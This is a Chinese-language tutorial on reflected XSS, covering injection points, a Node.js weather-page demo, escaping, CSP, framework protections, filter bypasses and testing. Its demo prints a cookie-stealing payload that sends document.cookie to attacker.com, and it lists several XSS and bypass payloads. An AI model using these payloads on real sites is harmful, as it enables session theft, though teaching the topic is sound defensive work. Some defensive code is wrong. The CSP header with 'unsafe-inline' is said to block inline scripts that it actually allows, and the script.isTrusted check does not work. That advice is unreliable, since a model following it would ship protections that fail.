反射型 XSS（非持久型）

反射型 XSS（非持久型）的基本原理

反射型 XSS 攻击中，恶意脚本作为请求的一部分发送到服务器，服务器未经过滤直接将内容返回给客户端。攻击者通常通过构造特殊 URL 诱导用户点击，脚本在受害者浏览器执行。与存储型 XSS 不同，这种攻击不会持久化在服务器上，每次触发都需要用户主动访问恶意链接。

典型场景出现在搜索框、错误消息页面等动态内容渲染处。例如：

// 假设服务端直接返回URL参数内容
http://example.com/search?query=<script>alert('XSS')</script>

当服务器未对 query 参数过滤时，这段脚本会被插入到 HTML 中执行。

攻击实现的关键环节

1. 输入注入点：任何接收用户输入并直接输出的接口都可能成为入口。常见于：

   • URL 参数（GET 请求）
   • 表单提交（POST 请求）
   • HTTP 头部（如 Referer、User-Agent）

2. 输出无过滤：服务端未对以下字符进行转义：

   < > & " ' / 
   

   导致浏览器将其解析为 HTML 标记而非普通文本。

3. 触发条件：需要用户交互行为，比如：

   • 点击钓鱼链接
   • 提交伪造表单
   • 打开恶意附件中的链接

实际攻击案例演示

假设存在一个天气预报查询页面：

// 服务端代码（Node.js示例）
app.get('/weather', (req, res) => {
  res.send(`<h1>${req.query.city}的天气预报</h1>`)
})

攻击者构造如下链接：

/weather?city=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

当用户点击该链接时，当前站点的 Cookie 会被发送到攻击者服务器。

防御手段与技术实现

1. 输入输出过滤

服务端过滤示例（PHP）：

$city = htmlspecialchars($_GET['city'], ENT_QUOTES, 'UTF-8');
echo "<h1>{$city}的天气预报</h1>";

前端过滤补充（JavaScript）：

function escapeHtml(unsafe) {
  return unsafe.replace(/[&<"'>]/g, function(match) {
    return {
      '&': '&amp;',
      '<': '&lt;',
      '>': '&gt;',
      '"': '&quot;',
      "'": '&#39;'
    }[match];
  });
}

2. CSP 内容安全策略

通过 HTTP 头强制限制资源加载：

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'

可阻止以下攻击：

<script>alert(1)</script>
<img src="x" onerror="alert(1)">

3. 现代框架的自动防护

React/Vue/Angular 等框架默认提供 XSS 防护：

// React 示例：插值内容会自动转义
function Weather({ city }) {
  return <h1>{city}的天气预报</h1>
}

特殊场景下的绕过与防护

1. 基于 DOM 的反射型 XSS

当恶意代码通过 DOM 操作而非服务端注入时：

// 漏洞代码
document.getElementById('result').innerHTML = 
  new URLSearchParams(location.search).get('error')

攻击者可构造：

?error=<img src=x onerror=alert(1)>

防御方案：

// 使用textContent替代innerHTML
element.textContent = userInput

2. URL 编码混淆攻击

攻击者可能使用多重编码绕过简单过滤：

%3Cscript%3Ealert(1)%3C/script%3E

需在过滤前统一解码：

decodeURIComponent(input)

3. 非脚本攻击向量

即使过滤了 <script>，仍可能通过其他方式触发：

<!-- SVG 向量 -->
<svg onload="alert(1)">
<!-- 伪协议 -->
<a href="javascript:alert(1)">点击</a>

需要完整黑名单或白名单过滤策略。

测试与验证方法

1. 手工测试：尝试注入基础 payload：

   '"><img src=x onerror=alert(1)>
   

2. 自动化工具：

   • OWASP ZAP
   • Burp Suite Scanner
   • XSS Hunter（用于盲检测）

3. 浏览器控制台检测：

   // 检查是否执行了未授权脚本
   Array.from(document.scripts).forEach(script => {
     if(!script.isTrusted) console.warn('Untrusted script:', script.src)
   })
   

企业级防护架构设计

1. 边缘防护层：

   • Web 应用防火墙（WAF）规则：

     SecRule ARGS "@detectXSS" "id:101,deny"
     

2. 运行时防护：

   • 使用 Trusted Types API：

     // 强制类型检查
     if (typeof trustedTypes !== 'undefined') {
       trustedTypes.createPolicy('default', {
         createHTML: input => sanitize(input)
       });
     }
     

3. 监控体系：

   • 实时日志分析可疑参数
   • CSP 违规报告收集

开发者常见误区

1. 过度依赖前端过滤：

   // 错误示例：仅前端过滤
   function search() {
     let query = document.getElementById('input').value.replace('<script>', '')
     // 仍然可能被绕过
   }
   

2. 忽略二次编码场景：

   %2522onload%253Dalert(1)  // 双重编码后的引号
   

3. 错误使用安全函数：

   // 错误：错误使用转义函数
   element.innerHTML = escapeHtml(userInput) // 某些属性仍可执行